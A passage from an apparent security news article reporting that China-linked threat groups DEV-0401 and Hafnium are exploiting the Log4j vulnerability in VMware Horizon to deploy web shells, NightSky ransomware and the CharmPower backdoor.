The disclosure comes as Microsoft and the NHS cautioned that internet-facing systems running VMware Horizon are being targeted to deploy web shells and a new strain of ransomware called NightSky, with the tech giant connecting the latter to a China-based operator dubbed DEV-0401, which has also deployed LockFile, AtomSilo, and Rook ransomware in the past.

What’s more, Hafnium, another threat actor group operating out of China, has also been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting, Microsoft noted.

“Judging by their ability to take advantage of the Log4j vulnerability and by the code pieces of the CharmPower backdoor, the actors are able to change gears rapidly and actively develop different implementations for each stage of their attacks,” the researchers said.

Read More